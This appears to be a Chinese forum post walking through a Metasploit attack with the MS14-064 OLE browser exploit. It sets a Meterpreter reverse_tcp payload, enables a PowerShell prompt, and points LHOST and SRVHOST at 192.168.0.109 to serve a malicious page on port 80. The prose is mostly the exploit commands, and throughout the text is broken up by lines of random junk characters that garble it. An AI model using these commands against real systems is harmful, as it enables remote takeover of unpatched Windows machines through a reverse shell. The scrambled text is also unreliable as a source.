& N, @# \# P/ ]2 W. H: h
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
- K$ Z2 q$ @0 E/ M" [3 b
% G) U V1 l6 C
$ L# L( ~2 w1 p( m/ d, e# |# ^ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
1 L) e2 q6 ?1 X) y' m
7 [$ ]) L" ~/ K
# u' ?/ Q+ z: y- c
然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
- L7 b: U7 l5 c9 A6 m
8 w9 D9 v7 {% [6 { n' r6 t4 U) e9 {5 `# E* r- t2 T* ^* e
set AllowPowershellPrompt true
4 e, r9 ]4 J8 f% M) S2 `: s6 a. O
$ |2 C) C, H* L) L2 }9 n- w s+ j: ?2 @. P6 C3 ^& G" z
Set LHOST 192.168.0.109& {7 T* o+ D" R1 e8 i; M
9 x) s- ~* \% G4 [. h/ a7 `+ D$ o7 e p- L5 ~& w; A
set SRVHOST 192.168.0.109
3 g7 H8 l% Y; B
4 e$ x. {8 ^' E' q2 {
/ N1 l+ b5 d# g8 n+ ? Set uripath share
5 n- m, P( D/ H# `& I1 S4 ?
; _* j7 @# R' U' i G/ _2 r: I$ n9 B8 ^3 S% v% e
Set srvport 80 l/ l" o; s3 @
" |' e% d6 G4 ?- [! R' {' |; h8 _
3 s4 M2 o# v& P% D% C: K7 V& W
! D% C% K3 S) s+ R1 k: j. C( }, t) ] ^3 X/ O/ C
; s& u' U! E, |8 m, o, {) f; F
% Y6 X, b- w3 W$ {# c5 ] z
5 L3 O1 X' m5 J% X4 l$ A
: h3 C/ S% P: t) C4 N0 I/ h
" n/ T% w) \: H* b: t0 E) B2 l6 W" ]: x
. h) k: P' N! k/ {% R, h" ?
$ U5 c$ `4 E7 \' e0 X
" w8 X3 |8 W: y4 w 5 M( x% K' [% ]8 x, p2 e$ T1 c( S
$ y$ E& u3 {+ L8 ~- T3 f
! r0 j; c1 {) a
下面我们来访问本地地址如图:
9 x' ]' z" @: B+ }. K
( h" F* I3 A# C( l: \+ d
/ W+ n( R" s& n3 ]) u% ?: X . v$ `0 _5 v6 O- w) c9 [7 S
/ O# G) a- J9 |9 _
. r* T6 C, t' c7 F. t( S
8 G8 Y D* ?2 H2 o6 M
m( |* M7 r8 ]+ Y/ F" K4 _' D9 }
5 F. D' c& R2 m